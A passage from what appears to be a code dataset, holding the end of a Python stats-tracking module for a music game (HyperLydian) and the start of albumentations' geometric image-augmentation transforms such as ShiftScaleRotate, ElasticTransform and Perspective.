type: {type(other)}')\n\n def __str__(self) -> str:\n return str(self.total_ms)\n\n def __repr__(self) -> str:\n return str(f'TimeStat(Hours={self.hours}, Minutes={self.minutes}, Seconds={self.seconds}, Milliseconds={self.ms})')\n\n\nclass TrackerStat:\n \"\"\"\n Tracks information about a numerical Stat that changes/updates frequently.\n\n Tracks the following:\n 1) Min. value recorded\n 2) Avg. of all values recorded\n 3) The most recent value recorded\n 4) Max. value recorded\n 5) Total number of values recorded\n\n \"\"\"\n def __init__(self, send_mode: int = 0, send: bool = True) -> None:\n self.sum = 0\n self.last = 0\n self.count = 0\n self.min = float('inf')\n self.max = float('-inf')\n\n if send_mode > len(self.list):\n send_mode = 0\n\n self.send_mode = send_mode\n self.send = send\n\n @property\n def avg(self) -> float:\n \"\"\"\n Calculate the average of all tracked values\n \"\"\"\n if self.count > 0:\n return self.sum / self.count\n else:\n return 0\n\n @property\n def list(self) -> List:\n \"\"\"\n All tracked values as a List\n \"\"\"\n return [self.min, self.avg, self.last, self.max, self.count]\n\n @property\n def value(self) -> Union[int, float, List]:\n \"\"\"\n Returns one or more of the tracked values depending on the send_mode\n\n send_mode = 0: Return all tracked values as a list\n send_mode = 1: Return the min\n send_mode = 2: Return the avg\n send_mode = 3: Return the most recent\n send_mode = 4: Return the max\n send_mode = 5: Return the count\n \"\"\"\n if self.send_mode == 0:\n return self.list\n\n return self.list[self.send_mode - 1]\n\n def add(self, val: float):\n \"\"\"\n Add a new value to be tracked\n \"\"\"\n self.last = val\n self.sum += val\n self.count += 1\n if val > self.max:\n self.max = val\n if val < self.min:\n self.min = val\n\n def __str__(self) -> str:\n return str(self.avg)\n\n def __repr__(self) -> str:\n return str(f'TrackerStat(Average={self.avg}, Last={self.last} Count={self.count}, Min={self.min}, Max={self.max})')\n\n\nclass CounterStat:\n \"\"\"A stat that maps strings to counts\"\"\"\n def __init__(self, init_values: List[str] = None, send: bool = True) -> None:\n self._items = {} if init_values is None else {key: 0 for key in init_values}\n self.count = 0\n self.send = send\n\n @property\n def items(self) -> List[Union[str, int]]:\n \"\"\"\n Returns a List of tuple pairs: (item_str, item_count)\n \"\"\"\n items_list = []\n for key, val in self._items.items():\n items_list.extend([key, val])\n return items_list\n\n def get(self, item: str) -> int:\n \"\"\"Get an item by name\"\"\"\n return self._items[item]\n\n def increase(self, item: str) -> None:\n \"\"\"Increase the value of an item, or add the item to the map\"\"\"\n if item not in self._items:\n self._items[item] = 1\n else:\n self._items[item] += 1\n\n self.count += 1\n\n\nclass ListStat:\n \"\"\"A stat that tracks Lists\"\"\"\n def __init__(self, initial_length: int = 0, initial_fill: int = 0, send: bool = True) -> None:\n self.list = [initial_fill for _ in range(initial_length)]\n self.send = send\n\n def add_at_index(self, index: int, val: int):\n \"\"\"Increase the value at the index by one\"\"\"\n self.list[index] += val\n\n def update(self, *vals: int):\n \"\"\"Update the entire list to equal this new list\"\"\"\n for idx, val in enumerate(vals):\n self.list[idx] = val\n\n def get(self, index: int) -> Stat:\n \"\"\"Return an element from the list at the given index\"\"\"\n return Stat(self.list[index])\n\n def __str__(self) -> str:\n return str(', '.join(self.list))\n\n def __repr__(self) -> str:\n return str(f'ListStat(List={self.list})')\n\n\nclass StatTracker:\n \"\"\"\n Tracks all game information as Stats.\n\n Displays some of these stats at the end DEATH MENU.\n\n Sends relevant stats over OSC at the provided port.\n \"\"\"\n\n OUTPUT_STATS_FORMAT = [\n 'SCORE: {buffer}{value}',\n 'ENEMIES KILLED: {buffer}{value}',\n 'PLAYER ACCURACY: {buffer}{value}%',\n 'PLAYER HEALTH LOST: {buffer}{value}',\n 'NOTES RECOVERED: {buffer}{value}',\n 'UPGRADES PICKED UP: {buffer}{value}',\n 'TIME SURVIVED: {buffer}{value}',\n 'TOTAL TIME PLAYED: {buffer}{value}',\n ]\n\n def __init__(self, osc: OSCHandler) -> None:\n self.osc = osc\n\n # Stats that track throughout each playthrough\n self.control__max_init = Stat(0)\n self.control__game_init = Stat(0)\n self.control__menu_init = Stat(0)\n self.control__max_quit = Stat(0)\n self.control__output_device = TextStat()\n self.control__fps = Stat(FPS)\n self.control__num_voices = Stat(NUM_VOICES)\n self.control__screen_width = Stat(SCREEN_WIDTH)\n self.control__screen_height = Stat(SCREEN_HEIGHT)\n self.control__record_music = Stat(RECORD_MUSIC)\n\n self.game__play_count = Stat(0)\n self.game__time__total_played = TimeStat(0)\n\n def init_new_playthrough(self, start_time_ms: int = 0, player_max_health: int = 0):\n \"\"\"Reset Stats on a new Playthrough\"\"\"\n\n # Time trackers\n self.start_time = start_time_ms\n self.time_last_enemy_killed = start_time_ms\n self.time_player_last_hit = start_time_ms\n self.time_last_collected_note = start_time_ms\n\n self.control__game_init = Stat(0)\n self.control__menu_init = Stat(0)\n self.control__reset_music = Stat(0)\n\n self.game__score = Stat(0)\n self.game__total_frames = Stat(0)\n self.game__time__current_playthrough = TimeStat(0)\n self.game__num_events = Stat(0)\n self.game__percent__note_over_enemy_score = Stat(50.)\n\n self.player__starting_position = ListStat(initial_length=2)\n self.player__starting_angle = Stat(0)\n self.player__position = ListStat(initial_length=2)\n self.player__vertical_half = TextStat()\n self.player__horizontal_half = TextStat()\n self.player__frames__moving_and_rotating = Stat(0)\n self.player__frames__moving = Stat(0)\n self.player__frames__still = Stat(0)\n self.player__frames__rotating = Stat(0)\n self.player__frames__firing = Stat(0)\n self.player__frames__per_screen_quadrant = ListStat(initial_length=4)\n self.player__frames__per_angle_quadrant = ListStat(initial_length=4)\n self.player__percent__firing_weapon = Stat(0.)\n self.player__percent__moving_over_rotating = Stat(50.)\n self.player__percent__moving_and_rotating = Stat(50.)\n self.player__percent__health_lost_over_gained = Stat(50.)\n self.player__percent__dodges_over_enemy_collision = Stat(50.)\n self.player__percent__hit_rests_over_accidentals = Stat(50.)\n self.player__percent__missed_notes_over_dodges = Stat(50.)\n self.player__curr_velocity = ListStat(initial_length=2)\n self.player__curr_speed = Stat(0)\n self.player__angle = Stat(0)\n self.player__last_rotation_direction = Stat(0)\n self.player__percent__accuracy = Stat(0.0)\n self.player__time__between_kills = TrackerStat()\n self.player__time__between_getting_hit = TrackerStat()\n self.player__max_health = Stat(player_max_health)\n self.player__curr_health = Stat(player_max_health)\n self.player__health_lost = Stat(0)\n self.player__health_gained = Stat(0)\n self.player__projectile_hit_count = CounterStat(PROJECTILE_TYPES)\n self.player__hit_distance = TrackerStat()\n self.player__enemies_collided = Stat(0)\n self.player__dodges = Stat(0)\n self.player__missed_nearby_notes = Stat(0)\n self.player__alive_projectiles = Stat(0)\n\n self.notes__collected = Stat(0)\n self.notes__total = Stat(0)\n self.notes__score = Stat(0)\n self.notes__time__between_collecting = TrackerStat()\n self.notes__time__lifespan = TrackerStat()\n self.notes__percent__collected = Stat(0)\n\n self.weapon__selected = Stat(0)\n self.weapon__total_shots_fired = Stat(0)\n self.weapon__shots_per_weapon = ListStat(initial_length=2)\n self.weapon__hits_per_weapon = ListStat(initial_length=2)\n self.weapon__frames__per_weapon = ListStat(initial_length=2)\n self.weapon__percent__one_over_two = Stat(0)\n\n self.upgrades__total_dropped = Stat(0)\n self.upgrades__picked_up = Stat(0)\n self.upgrades__missed = Stat(0)\n self.upgrades__time__between_collecting = TrackerStat()\n self.upgrades__time__lifespan = TrackerStat()\n self.upgrades__percent__collected = Stat(0)\n\n self.enemies__total = Stat(0)\n self.enemies__standard_count = Stat(0)\n self.enemies__special_count = Stat(0)\n self.enemies__num_on_screen = TrackerStat(0)\n self.enemies__hit = Stat(0)\n self.enemies__killed = Stat(0)\n self.enemies__hit_distance = TrackerStat()\n self.enemies__alive_projectiles = Stat(0)\n self.enemies__score = Stat(0)\n self.enemies__time__lifespan = TrackerStat()\n\n self.game__play_count += 1\n\n def send_stats(self):\n \"\"\"Send all stats over OSC\"\"\"\n osc_stats = self.convert_osc_stats_to_dict()\n self.osc.union_bundle(osc_stats)\n if not debug.DISABLE_OSC_SEND:\n self.osc.send_full_bundle()\n\n def update_stats(self):\n \"\"\"Update stats based on other stats\"\"\"\n # Update score\n self.game__score = self.enemies__score + self.notes__score\n\n # Update player accuracy\n if self.weapon__total_shots_fired > 0:\n self.player__percent__accuracy = (self.enemies__hit / self.weapon__total_shots_fired) * 100\n\n # Update player position stats\n horizontal_half = \"left\" if self.player__position.list[0] < SCREEN_WIDTH / 2 else \"right\"\n vertical_half = \"top\" if self.player__position.list[1] < SCREEN_HEIGHT / 2 else \"bottom\"\n self.player__horizontal_half.update(horizontal_half)\n self.player__vertical_half.update(vertical_half)\n\n if vertical_half == \"top\":\n # top left == quadrant 0\n if horizontal_half == \"left\":\n self.player__frames__per_screen_quadrant.add_at_index(0, 1)\n # top right == quadrant 1\n else:\n self.player__frames__per_screen_quadrant.add_at_index(1, 1)\n else:\n # bottom left == quadrant 2\n if horizontal_half == \"left\":\n self.player__frames__per_screen_quadrant.add_at_index(2, 1)\n # bottom right == quadrant 3\n else:\n self.player__frames__per_screen_quadrant.add_at_index(3, 1)\n\n # Update movement vs rotating vs non-movement ratio\n total = self.player__frames__moving + self.player__frames__rotating\n if total > 0:\n self.player__percent__moving_over_rotating = (self.player__frames__moving / total) * 100\n\n # Update movement and rotating vs just movement or just rotation\n total = self.player__frames__moving + self.player__frames__rotating + self.player__frames__moving_and_rotating\n if total > 0:\n self.player__percent__moving_and_rotating = (self.player__frames__moving_and_rotating / total) * 100\n\n # Update firing vs not ratio\n if self.game__total_frames > 0:\n self.player__percent__firing_weapon = (self.player__frames__firing / self.game__total_frames) * 100\n\n # Upgrade percentage\n if self.upgrades__total_dropped > 0:\n self.upgrades__percent__collected = (self.upgrades__picked_up / self.upgrades__total_dropped) * 100\n\n if self.notes__total > 0:\n self.notes__percent__collected = (self.notes__collected / self.notes__total) * 100\n\n # Update weapon usage\n if self.weapon__total_shots_fired > 0:\n self.weapon__percent__one_over_two = \\\n (self.weapon__shots_per_weapon.get(0) / self.weapon__total_shots_fired) * 100\n\n # Health lost vs gained\n total = self.player__health_lost + self.player__health_gained\n if total > 0:\n self.player__percent__health_lost_over_gained = (self.player__health_lost / total) * 100\n\n # Dodges vs enemy collisions\n total = self.player__dodges + self.player__enemies_collided\n if total > 0:\n self.player__percent__dodges_over_enemy_collision = (self.player__dodges / total) * 100\n\n # Missed notes vs dodges\n total = self.player__missed_nearby_notes + self.player__dodges\n if total > 0:\n self.player__percent__missed_notes_over_dodges = (self.player__missed_nearby_notes / total) * 100\n\n # Rests vs accidentals\n projectile_hit_count = self.player__projectile_hit_count.count\n if projectile_hit_count > 0:\n num_rests = self.player__projectile_hit_count.get(REST)\n self.player__percent__hit_rests_over_accidentals.update((num_rests / projectile_hit_count) * 100)\n\n # Note vs enemy score\n if self.game__score > 0:\n self.game__percent__note_over_enemy_score = (self.notes__score / self.game__score) * 100\n\n def convert_osc_stats_to_dict(self) -> Dict[str, Any]:\n \"\"\"Convert stats into a dictionary to be used by the OSC manager\"\"\"\n stat_dict = {}\n\n for stat_name, stat in self.__dict__.items():\n if not hasattr(stat, 'send') or not stat.send:\n continue\n\n if isinstance(stat, Stat):\n stat_dict[stat_name] = stat.value\n elif isinstance(stat, TimeStat):\n stat_dict[stat_name] = stat.time\n elif isinstance(stat, TrackerStat):\n stat_dict[stat_name] = stat.value\n elif isinstance(stat, ListStat):\n stat_dict[stat_name] = stat.list\n elif isinstance(stat, TextStat):\n stat_dict[stat_name] = stat.text\n elif isinstance(stat, CounterStat):\n stat_dict[stat_name] = stat.items\n\n return stat_dict\n\n def set_game_time(self, total_time_elapsed_ms: int):\n \"\"\"Set the time that a new game playthrough begins\"\"\"\n # calculate playthrough time\n playthrough_time_elapsed = total_time_elapsed_ms - self.start_time\n self.game__time__current_playthrough = TimeStat(playthrough_time_elapsed)\n\n # calculate total time\n self.game__time__total_played = TimeStat(total_time_elapsed_ms)\n\n def print_stats(self):\n \"\"\"Print Stats to the console\"\"\"\n print(f'---- Game {self.game__play_count} ----')\n print(f'Score: {self.game__score}')\n print(f'Enemies Killed: {self.enemies__killed}')\n print(f'Enemy shots dodged: {self.player__dodges}')\n print(f'Avg time to kill an Enemy: {self.player__time__between_kills.avg / 1000}')\n print(f'Total Shots Fired: {self.weapon__total_shots_fired}')\n print(f'Enemies Hit: {self.enemies__hit}')\n print(f'Player Shot Accuracy: {self.player__percent__accuracy}%')\n print(\n f'Time Survived: {self.game__time__current_playthrough.hours} Hours, '\n f'{self.game__time__current_playthrough.minutes} Minutes, '\n f'{self.game__time__current_playthrough.seconds} Seconds'\n )\n print(\n f'Total Time Played: {self.game__time__total_played.hours} Hours, '\n f'{self.game__time__total_played.minutes} Minutes, '\n f'{self.game__time__total_played.seconds} Seconds'\n )\n print()\n\n def get_endgame_stats(self) -> str:\n \"\"\"Formats the endgame stats text to be displayed during the DEATH MENU\"\"\"\n stats_to_report = [\n self.game__score,\n self.enemies__killed,\n int(self.player__percent__accuracy.value),\n self.player__health_lost,\n self.notes__collected,\n self.upgrades__picked_up,\n self.game__time__current_playthrough.time_display,\n self.game__time__total_played.time_display,\n ]\n\n # Format lines without buffer\n stats_str_no_buffer = [\n stat_str.format(buffer=0, value=stats_to_report[idx])\n for idx, stat_str in enumerate(self.OUTPUT_STATS_FORMAT)\n ]\n\n # Calculate buffer for each line\n longest_line = len(max(stats_str_no_buffer, key=len))\n buffer_per_line = [\n ' ' * (longest_line - len(line)) for line in stats_str_no_buffer\n ]\n\n # Re-format lines with buffer\n stats_str_with_buffer = [\n stat_str.format(buffer=buffer_per_line[idx], value=stats_to_report[idx])\n for idx, stat_str in enumerate(self.OUTPUT_STATS_FORMAT)\n ]\n\n return '\\n'.join(stats_str_with_buffer)\n\n\n\nstat_tracker = StatTracker(osc=osc)\n","repo_name":"gloliva/HyperLydian","sub_path":"game/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":22049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"928641809","text":"import math\nimport random\nfrom enum import Enum\nfrom typing import Dict, Optional, Sequence, Tuple, Union\n\nimport cv2\nimport numpy as np\nimport skimage.transform\n\nfrom albumentations.core.bbox_utils import denormalize_bbox, normalize_bbox\n\nfrom ... import random_utils\nfrom ...core.transforms_interface import (\n BoxInternalType,\n DualTransform,\n ImageColorType,\n KeypointInternalType,\n ScaleFloatType,\n to_tuple,\n)\nfrom ..functional import bbox_from_mask\nfrom . import functional as F\n\n__all__ = [\n \"ShiftScaleRotate\",\n \"ElasticTransform\",\n \"Perspective\",\n \"Affine\",\n \"PiecewiseAffine\",\n \"VerticalFlip\",\n \"HorizontalFlip\",\n \"Flip\",\n \"Transpose\",\n \"OpticalDistortion\",\n \"GridDistortion\",\n \"PadIfNeeded\",\n]\n\n\nclass ShiftScaleRotate(DualTransform):\n \"\"\"Randomly apply affine transforms: translate, scale and rotate the input.\n\n Args:\n shift_limit ((float, float) or float): shift factor range for both height and width. If shift_limit\n is a single float value, the range will be (-shift_limit, shift_limit). Absolute values for lower and\n upper bounds should lie in range [0, 1]. Default: (-0.0625, 0.0625).\n scale_limit ((float, float) or float): scaling factor range. If scale_limit is a single float value, the\n range will be (-scale_limit, scale_limit). Note that the scale_limit will be biased by 1.\n If scale_limit is a tuple, like (low, high), sampling will be done from the range (1 + low, 1 + high).\n Default: (-0.1, 0.1).\n rotate_limit ((int, int) or int): rotation range. If rotate_limit is a single int value, the\n range will be (-rotate_limit, rotate_limit). Default: (-45, 45).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of int,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n shift_limit_x ((float, float) or float): shift factor range for width. If it is set then this value\n instead of shift_limit will be used for shifting width. If shift_limit_x is a single float value,\n the range will be (-shift_limit_x, shift_limit_x). Absolute values for lower and upper bounds should lie in\n the range [0, 1]. Default: None.\n shift_limit_y ((float, float) or float): shift factor range for height. If it is set then this value\n instead of shift_limit will be used for shifting height. If shift_limit_y is a single float value,\n the range will be (-shift_limit_y, shift_limit_y). Absolute values for lower and upper bounds should lie\n in the range [0, 1]. Default: None.\n rotate_method (str): rotation method used for the bounding boxes. Should be one of \"largest_box\" or \"ellipse\".\n Default: \"largest_box\"\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n shift_limit=0.0625,\n scale_limit=0.1,\n rotate_limit=45,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n shift_limit_x=None,\n shift_limit_y=None,\n rotate_method=\"largest_box\",\n always_apply=False,\n p=0.5,\n ):\n super(ShiftScaleRotate, self).__init__(always_apply, p)\n self.shift_limit_x = to_tuple(shift_limit_x if shift_limit_x is not None else shift_limit)\n self.shift_limit_y = to_tuple(shift_limit_y if shift_limit_y is not None else shift_limit)\n self.scale_limit = to_tuple(scale_limit, bias=1.0)\n self.rotate_limit = to_tuple(rotate_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.rotate_method = rotate_method\n\n if self.rotate_method not in [\"largest_box\", \"ellipse\"]:\n raise ValueError(f\"Rotation method {self.rotate_method} is not valid.\")\n\n def apply(self, img, angle=0, scale=0, dx=0, dy=0, interpolation=cv2.INTER_LINEAR, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img, angle=0, scale=0, dx=0, dy=0, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n\n def apply_to_keypoint(self, keypoint, angle=0, scale=0, dx=0, dy=0, rows=0, cols=0, **params):\n return F.keypoint_shift_scale_rotate(keypoint, angle, scale, dx, dy, rows, cols)\n\n def get_params(self):\n return {\n \"angle\": random.uniform(self.rotate_limit[0], self.rotate_limit[1]),\n \"scale\": random.uniform(self.scale_limit[0], self.scale_limit[1]),\n \"dx\": random.uniform(self.shift_limit_x[0], self.shift_limit_x[1]),\n \"dy\": random.uniform(self.shift_limit_y[0], self.shift_limit_y[1]),\n }\n\n def apply_to_bbox(self, bbox, angle, scale, dx, dy, **params):\n return F.bbox_shift_scale_rotate(bbox, angle, scale, dx, dy, self.rotate_method, **params)\n\n def get_transform_init_args(self):\n return {\n \"shift_limit_x\": self.shift_limit_x,\n \"shift_limit_y\": self.shift_limit_y,\n \"scale_limit\": to_tuple(self.scale_limit, bias=-1.0),\n \"rotate_limit\": self.rotate_limit,\n \"interpolation\": self.interpolation,\n \"border_mode\": self.border_mode,\n \"value\": self.value,\n \"mask_value\": self.mask_value,\n \"rotate_method\": self.rotate_method,\n }\n\n\nclass ElasticTransform(DualTransform):\n \"\"\"Elastic deformation of images as described in [Simard2003]_ (with modifications).\n Based on https://gist.github.com/ernestum/601cdf56d2b424757de5\n\n .. [Simard2003] Simard, Steinkraus and Platt, \"Best Practices for\n Convolutional Neural Networks applied to Visual Document Analysis\", in\n Proc. of the International Conference on Document Analysis and\n Recognition, 2003.\n\n Args:\n alpha (float):\n sigma (float): Gaussian filter parameter.\n alpha_affine (float): The range will be (-alpha_affine, alpha_affine)\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n approximate (boolean): Whether to smooth displacement map with fixed kernel size.\n Enabling this option gives ~2X speedup on large images.\n same_dxdy (boolean): Whether to use same random generated shift for x and y.\n Enabling this option gives ~2X speedup.\n\n Targets:\n image, mask, bbox\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n alpha=1,\n sigma=50,\n alpha_affine=50,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n always_apply=False,\n approximate=False,\n same_dxdy=False,\n p=0.5,\n ):\n super(ElasticTransform, self).__init__(always_apply, p)\n self.alpha = alpha\n self.alpha_affine = alpha_affine\n self.sigma = sigma\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.approximate = approximate\n self.same_dxdy = same_dxdy\n\n def apply(self, img, random_state=None, interpolation=cv2.INTER_LINEAR, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n interpolation,\n self.border_mode,\n self.value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def apply_to_mask(self, img, random_state=None, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n cv2.INTER_NEAREST,\n self.border_mode,\n self.mask_value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def apply_to_bbox(self, bbox, random_state=None, **params):\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.elastic_transform(\n mask,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n cv2.INTER_NEAREST,\n self.border_mode,\n self.mask_value,\n np.random.RandomState(random_state),\n self.approximate,\n )\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def get_params(self):\n return {\"random_state\": random.randint(0, 10000)}\n\n def get_transform_init_args_names(self):\n return (\n \"alpha\",\n \"sigma\",\n \"alpha_affine\",\n \"interpolation\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n \"approximate\",\n \"same_dxdy\",\n )\n\n\nclass Perspective(DualTransform):\n \"\"\"Perform a random four point perspective transform of the input.\n\n Args:\n scale (float or (float, float)): standard deviation of the normal distributions. These are used to sample\n the random distances of the subimage's corners from the full image's corners.\n If scale is a single float value, the range will be (0, scale). Default: (0.05, 0.1).\n keep_size (bool): Whether to resize image’s back to their original size after applying the perspective\n transform. If set to False, the resulting images may end up having different shapes\n and will always be a list, never an array. Default: True\n pad_mode (OpenCV flag): OpenCV border mode.\n pad_val (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n Default: 0\n mask_pad_val (int, float, list of int, list of float): padding value for mask\n if border_mode is cv2.BORDER_CONSTANT. Default: 0\n fit_output (bool): If True, the image plane size and position will be adjusted to still capture\n the whole image after perspective transformation. (Followed by image resizing if keep_size is set to True.)\n Otherwise, parts of the transformed image may be outside of the image plane.\n This setting should not be set to True when using large scale values as it could lead to very large images.\n Default: False\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n scale=(0.05, 0.1),\n keep_size=True,\n pad_mode=cv2.BORDER_CONSTANT,\n pad_val=0,\n mask_pad_val=0,\n fit_output=False,\n interpolation=cv2.INTER_LINEAR,\n always_apply=False,\n p=0.5,\n ):\n super().__init__(always_apply, p)\n self.scale = to_tuple(scale, 0)\n self.keep_size = keep_size\n self.pad_mode = pad_mode\n self.pad_val = pad_val\n self.mask_pad_val = mask_pad_val\n self.fit_output = fit_output\n self.interpolation = interpolation\n\n def apply(self, img, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective(\n img, matrix, max_width, max_height, self.pad_val, self.pad_mode, self.keep_size, params[\"interpolation\"]\n )\n\n def apply_to_bbox(self, bbox, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_bbox(bbox, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size)\n\n def apply_to_keypoint(self, keypoint, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_keypoint(\n keypoint, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params):\n h, w = params[\"image\"].shape[:2]\n\n scale = random_utils.uniform(*self.scale)\n points = random_utils.normal(0, scale, [4, 2])\n points = np.mod(np.abs(points), 1)\n\n # top left -- no changes needed, just use jitter\n # top right\n points[1, 0] = 1.0 - points[1, 0] # w = 1.0 - jitter\n # bottom right\n points[2] = 1.0 - points[2] # w = 1.0 - jitt\n # bottom left\n points[3, 1] = 1.0 - points[3, 1] # h = 1.0 - jitter\n\n points[:, 0] *= w\n points[:, 1] *= h\n\n # Obtain a consistent order of the points and unpack them individually.\n # Warning: don't just do (tl, tr, br, bl) = _order_points(...)\n # here, because the reordered points is used further below.\n points = self._order_points(points)\n tl, tr, br, bl = points\n\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n min_width = None\n max_width = None\n while min_width is None or min_width < 2:\n width_top = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n width_bottom = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n max_width = int(max(width_top, width_bottom))\n min_width = int(min(width_top, width_bottom))\n if min_width < 2:\n step_size = (2 - min_width) / 2\n tl[0] -= step_size\n tr[0] += step_size\n bl[0] -= step_size\n br[0] += step_size\n\n # compute the height of the new image, which will be the maximum distance between the top-right\n # and bottom-right y-coordinates or the top-left and bottom-left y-coordinates\n min_height = None\n max_height = None\n while min_height is None or min_height < 2:\n height_right = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n height_left = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n max_height = int(max(height_right, height_left))\n min_height = int(min(height_right, height_left))\n if min_height < 2:\n step_size = (2 - min_height) / 2\n tl[1] -= step_size\n tr[1] -= step_size\n bl[1] += step_size\n br[1] += step_size\n\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left order\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n dst = np.array([[0, 0], [max_width, 0], [max_width, max_height], [0, max_height]], dtype=np.float32)\n\n # compute the perspective transform matrix and then apply it\n m = cv2.getPerspectiveTransform(points, dst)\n\n if self.fit_output:\n m, max_width, max_height = self._expand_transform(m, (h, w))\n\n return {\"matrix\": m, \"max_height\": max_height, \"max_width\": max_width, \"interpolation\": self.interpolation}\n\n @classmethod\n def _expand_transform(cls, matrix, shape):\n height, width = shape\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2, max_height\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n rect = np.array([[0, 0], [width, 0], [width, height], [0, height]], dtype=np.float32)\n dst = cv2.perspectiveTransform(np.array([rect]), matrix)[0]\n\n # get min x, y over transformed 4 points\n # then modify target points by subtracting these minima => shift to (0, 0)\n dst -= dst.min(axis=0, keepdims=True)\n dst = np.around(dst, decimals=0)\n\n matrix_expanded = cv2.getPerspectiveTransform(rect, dst)\n max_width, max_height = dst.max(axis=0)\n return matrix_expanded, int(max_width), int(max_height)\n\n @staticmethod\n def _order_points(pts: np.ndarray) -> np.ndarray:\n pts = np.array(sorted(pts, key=lambda x: x[0]))\n left = pts[:2] # points with smallest x coordinate - left points\n right = pts[2:] # points with greatest x coordinate - right points\n\n if left[0][1] < left[1][1]:\n tl, bl = left\n else:\n bl, tl = left\n\n if right[0][1] < right[1][1]:\n tr, br = right\n else:\n br, tr = right\n\n return np.array([tl, tr, br, bl], dtype=np.float32)\n\n def get_transform_init_args_names(self):\n return \"scale\", \"keep_size\", \"pad_mode\", \"pad_val\", \"mask_pad_val\", \"fit_output\", \"interpolation\"\n\n\nclass Affine(DualTransform):\n \"\"\"Augmentation to apply affine transformations to images.\n This is mostly a wrapper around the corresponding classes and functions in OpenCV.\n\n Affine transformations involve:\n\n - Translation (\"move\" image on the x-/y-axis)\n - Rotation\n - Scaling (\"zoom\" in/out)\n - Shear (move one side of the image, turning a square into a trapezoid)\n\n All such transformations can create \"new\" pixels in the image without a defined content, e.g.\n if the image is translated to the left, pixels are created on the right.\n A method has to be defined to deal with these pixel values.\n The parameters `cval` and `mode` of this class deal with this.\n\n Some transformations involve interpolations between several pixels\n of the input image to generate output pixel values. The parameters `interpolation` and\n `mask_interpolation` deals with the method of interpolation used for this.\n\n Args:\n scale (number, tuple of number 